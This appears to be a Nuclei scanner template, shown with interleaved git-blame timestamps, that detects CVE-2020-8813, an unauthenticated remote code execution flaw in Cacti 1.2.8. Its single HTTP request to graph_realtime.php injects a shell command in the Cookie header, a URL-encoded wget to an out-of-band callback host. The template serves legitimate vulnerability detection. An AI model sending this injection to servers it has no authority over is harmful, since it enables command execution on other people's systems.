2021-07-26 02:32:23 +00:00
id : CVE-2020-8813
info :
name : Cacti v1.2.8 - Unauthenticated Remote Code Execution
author : gy741
2021-09-10 11:26:40 +00:00
severity : high
2022-01-25 19:38:53 +00:00
description : This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability.
2021-08-18 11:37:49 +00:00
reference :
2021-07-26 02:32:23 +00:00
- https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
2022-05-17 09:18:12 +00:00
- https://github.com/Cacti/cacti/releases
- https://gist.github.com/mhaskar/ebe6b74c32fd0f7e1eedf1aabfd44129
- https://drive.google.com/file/d/1A8hxTyk_NgSp04zPX-23nPbsSDeyDFio/view
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 8.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-8813
cwe-id : CWE-78
2022-04-22 10:38:41 +00:00
tags : cve,cve2020,cacti,rce,oast
2021-07-26 02:32:23 +00:00
requests :
- raw :
- |
GET /graph_realtime.php?action=init HTTP/1.1
Host : {{Hostname}}
Cookie : Cacti=%3Bwget%20http%3A//{{interactsh-url}}
matchers :
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"